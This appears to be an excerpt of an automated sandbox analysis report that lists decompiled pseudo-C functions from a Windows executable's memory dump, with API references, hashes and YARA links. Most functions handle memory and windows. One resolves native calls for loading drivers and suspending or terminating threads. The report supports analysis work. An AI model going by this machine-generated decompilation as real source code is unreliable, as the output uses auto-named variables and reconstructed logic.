				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

q, xrefs: 00403556
cf@, xrefs: 0040352B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
